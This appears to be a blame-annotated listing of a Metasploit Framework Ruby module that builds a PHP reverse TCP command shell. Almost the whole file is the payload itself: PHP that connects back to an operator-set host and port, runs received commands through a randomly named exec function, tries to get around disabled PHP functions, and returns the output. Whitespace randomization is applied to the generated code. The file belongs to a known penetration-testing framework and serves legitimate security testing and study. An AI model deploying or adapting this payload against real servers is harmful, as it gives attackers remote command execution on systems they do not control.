2007-02-18 00:10:39 +00:00
|
|
|
##
|
2010-02-24 01:19:59 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2006-12-18 22:06:19 +00:00
|
|
|
require 'msf/core'
|
2008-07-01 01:44:56 +00:00
|
|
|
require 'msf/core/payload/php'
|
2006-12-18 22:06:19 +00:00
|
|
|
require 'msf/core/handler/reverse_tcp'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
2010-02-24 01:19:59 +00:00
|
|
|
require 'msf/base/sessions/command_shell_options'
|
2006-12-18 22:06:19 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
module Metasploit3
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
include Msf::Payload::Single
|
2008-07-01 01:44:56 +00:00
|
|
|
include Msf::Payload::Php
|
2010-02-24 01:19:59 +00:00
|
|
|
include Msf::Sessions::CommandShellOptions
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
2012-08-07 20:59:01 +00:00
|
|
|
'Name' => 'PHP Command Shell, Reverse TCP (via PHP)',
|
2008-03-04 07:34:26 +00:00
|
|
|
'Description' => 'Reverse PHP connect back shell with checks for disabled functions',
|
2009-04-30 06:10:12 +00:00
|
|
|
'Author' => 'egypt',
|
2006-12-18 22:06:19 +00:00
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Handler' => Msf::Handler::ReverseTcp,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Offsets' => { },
|
|
|
|
'Payload' => ''
|
|
|
|
}
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
2008-03-04 07:34:26 +00:00
|
|
|
#
|
|
|
|
# Issues
|
|
|
|
# - Since each command is executed in a new shell, 'cd' does nothing.
|
|
|
|
# Perhaps it should be special-cased to call chdir()
|
2010-02-24 01:19:59 +00:00
|
|
|
# - Tries to get around disable_functions but makes no attempts to
|
|
|
|
# circumvent safe mode.
|
2006-12-18 22:06:19 +00:00
|
|
|
#
|
|
|
|
def php_reverse_shell
|
2007-02-04 01:53:43 +00:00
|
|
|
|
2008-03-04 20:50:39 +00:00
|
|
|
if (!datastore['LHOST'] or datastore['LHOST'].empty?)
|
2008-03-04 21:40:04 +00:00
|
|
|
# datastore is empty on msfconsole startup
|
2012-01-31 07:11:55 +00:00
|
|
|
ipaddr = '127.0.0.1'
|
2008-03-04 21:40:04 +00:00
|
|
|
port = 4444
|
|
|
|
else
|
2012-01-31 07:11:55 +00:00
|
|
|
ipaddr = datastore['LHOST']
|
2008-03-04 21:40:04 +00:00
|
|
|
port = datastore['LPORT']
|
2008-03-04 20:50:39 +00:00
|
|
|
end
|
2008-10-13 05:31:36 +00:00
|
|
|
exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)
|
2012-06-06 05:22:36 +00:00
|
|
|
|
2012-01-31 07:11:55 +00:00
|
|
|
uri = "tcp://#{ipaddr}"
|
|
|
|
socket_family = "AF_INET"
|
|
|
|
|
|
|
|
if Rex::Socket.is_ipv6?(ipaddr)
|
|
|
|
uri = "tcp://[#{ipaddr}]"
|
|
|
|
socket_family = "AF_INET6"
|
2012-08-07 20:59:01 +00:00
|
|
|
end
|
2008-03-04 07:34:26 +00:00
|
|
|
|
|
|
|
shell=<<-END_OF_PHP_CODE
|
2012-06-25 16:52:26 +00:00
|
|
|
$ipaddr='#{ipaddr}';
|
2008-03-04 07:34:26 +00:00
|
|
|
$port=#{port};
|
2008-07-01 01:44:56 +00:00
|
|
|
#{php_preamble({:disabled_varname => "$dis"})}
|
|
|
|
|
2008-10-13 05:31:36 +00:00
|
|
|
if(!function_exists('#{exec_funcname}')){
|
|
|
|
function #{exec_funcname}($c){
|
2009-09-10 06:11:47 +00:00
|
|
|
global $dis;
|
2008-09-04 03:52:02 +00:00
|
|
|
#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
|
2009-09-10 06:11:47 +00:00
|
|
|
return $o;
|
2008-09-04 03:52:02 +00:00
|
|
|
}
|
|
|
|
}
|
2008-07-01 01:44:56 +00:00
|
|
|
$nofuncs='no exec functions';
|
|
|
|
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
|
2012-01-31 07:11:55 +00:00
|
|
|
$s=@fsockopen("#{uri}",$port);
|
2008-07-01 01:44:56 +00:00
|
|
|
while($c=fread($s,2048)){
|
2009-09-10 06:11:47 +00:00
|
|
|
$out = '';
|
|
|
|
if(substr($c,0,3) == 'cd '){
|
|
|
|
chdir(substr($c,3,-1));
|
|
|
|
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
|
2008-03-04 07:34:26 +00:00
|
|
|
break;
|
2009-09-10 06:11:47 +00:00
|
|
|
}else{
|
|
|
|
$out=#{exec_funcname}(substr($c,0,-1));
|
|
|
|
if($out===false){
|
|
|
|
fwrite($s,$nofuncs);
|
|
|
|
break;
|
|
|
|
}
|
2008-03-04 07:34:26 +00:00
|
|
|
}
|
2008-07-01 01:44:56 +00:00
|
|
|
fwrite($s,$out);
|
2008-03-04 07:34:26 +00:00
|
|
|
}
|
2008-07-01 01:44:56 +00:00
|
|
|
fclose($s);
|
2008-03-04 07:34:26 +00:00
|
|
|
}else{
|
2012-01-31 07:11:55 +00:00
|
|
|
$s=@socket_create(#{socket_family},SOCK_STREAM,SOL_TCP);
|
2008-09-04 03:52:02 +00:00
|
|
|
@socket_connect($s,$ipaddr,$port);
|
|
|
|
@socket_write($s,"socket_create");
|
|
|
|
while($c=@socket_read($s,2048)){
|
2009-09-10 06:11:47 +00:00
|
|
|
$out = '';
|
|
|
|
if(substr($c,0,3) == 'cd '){
|
|
|
|
chdir(substr($c,3,-1));
|
|
|
|
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
|
2008-03-04 07:34:26 +00:00
|
|
|
break;
|
2009-09-10 06:11:47 +00:00
|
|
|
}else{
|
|
|
|
$out=#{exec_funcname}(substr($c,0,-1));
|
|
|
|
if($out===false){
|
|
|
|
@socket_write($s,$nofuncs);
|
|
|
|
break;
|
|
|
|
}
|
2008-03-04 07:34:26 +00:00
|
|
|
}
|
2008-09-04 03:52:02 +00:00
|
|
|
@socket_write($s,$out,strlen($out));
|
2008-03-04 07:34:26 +00:00
|
|
|
}
|
2008-09-04 03:52:02 +00:00
|
|
|
@socket_close($s);
|
2008-03-04 07:34:26 +00:00
|
|
|
}
|
|
|
|
END_OF_PHP_CODE
|
2006-12-18 22:06:19 +00:00
|
|
|
|
2008-03-04 20:50:39 +00:00
|
|
|
# randomize the spaces a bit
|
2008-07-01 01:44:56 +00:00
|
|
|
Rex::Text.randomize_space(shell)
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
return shell
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return super + php_reverse_shell
|
|
|
|
end
|
2010-02-24 01:19:59 +00:00
|
|
|
|
2009-04-30 06:10:12 +00:00
|
|
|
end
|